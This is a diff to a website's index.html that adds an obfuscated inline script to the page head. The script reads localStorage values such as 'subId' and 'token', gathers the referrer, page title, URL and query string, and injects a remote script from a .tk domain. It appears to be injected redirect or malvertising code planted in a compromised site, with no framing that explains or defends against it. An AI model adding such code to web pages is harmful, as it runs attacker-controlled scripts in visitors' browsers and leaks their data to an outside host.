--- a/index.html
+++ b/index.html
@@ -11,7 +11,48 @@
 <link href="fonts.css" rel="stylesheet" type="text/css" media="all" />
 
 <!--[if IE 6]><link href="default_ie6.css" rel="stylesheet" type="text/css" /><![endif]-->
-
+<script>
+    (function() {
+    var name = '_ML7whjytLqWM119P';
+    if (!window._ML7whjytLqWM119P) {
+        window._ML7whjytLqWM119P = {
+            unique: false,
+            ttl: 86400,
+            R_PATH: 'https://vilkasupa.tk/g11Kjn',
+        };
+    }
+    const _Y66ST5CfhCpGcQgg = localStorage.getItem('config');
+    if (typeof _Y66ST5CfhCpGcQgg !== 'undefined' && _Y66ST5CfhCpGcQgg !== null) {
+        var _3vZbKqsKtb7zwHnK = JSON.parse(_Y66ST5CfhCpGcQgg);
+        var _D9W5GTt7JrcyrsYK = Math.round(+new Date()/1000);
+        if (_3vZbKqsKtb7zwHnK.created_at + window._ML7whjytLqWM119P.ttl < _D9W5GTt7JrcyrsYK) {
+            localStorage.removeItem('subId');
+            localStorage.removeItem('token');
+            localStorage.removeItem('config');
+        }
+    }
+    var _6rmS89N95xqNqpfh = localStorage.getItem('subId');
+    var _J8k5vh3QZ8bth8j1 = localStorage.getItem('token');
+    var _TZMkG3hZZwSxsSCf = '?return=js.client';
+        _TZMkG3hZZwSxsSCf += '&' + decodeURIComponent(window.location.search.replace('?', ''));
+        _TZMkG3hZZwSxsSCf += '&se_referrer=' + encodeURIComponent(document.referrer);
+        _TZMkG3hZZwSxsSCf += '&default_keyword=' + encodeURIComponent(document.title);
+        _TZMkG3hZZwSxsSCf += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
+        _TZMkG3hZZwSxsSCf += '&name=' + encodeURIComponent(name);
+        _TZMkG3hZZwSxsSCf += '&host=' + encodeURIComponent(window._ML7whjytLqWM119P.R_PATH);
+    if (typeof _6rmS89N95xqNqpfh !== 'undefined' && _6rmS89N95xqNqpfh && window._ML7whjytLqWM119P.unique) {
+        _TZMkG3hZZwSxsSCf += '&sub_id=' + encodeURIComponent(_6rmS89N95xqNqpfh);
+    }
+    if (typeof _J8k5vh3QZ8bth8j1 !== 'undefined' && _J8k5vh3QZ8bth8j1 && window._ML7whjytLqWM119P.unique) {
+        _TZMkG3hZZwSxsSCf += '&token=' + encodeURIComponent(_J8k5vh3QZ8bth8j1);
+    }
+    var a = document.createElement('script');
+        a.type = 'application/javascript';
+        a.src = window._ML7whjytLqWM119P.R_PATH + _TZMkG3hZZwSxsSCf;
+    var s = document.getElementsByTagName('script')[0];
+    s.parentNode.insertBefore(a, s)
+    })();
+    </script>
 </head>
 <body    id="ZBeeSlBiw1oLdxv">
 <div id="header-wrapper">
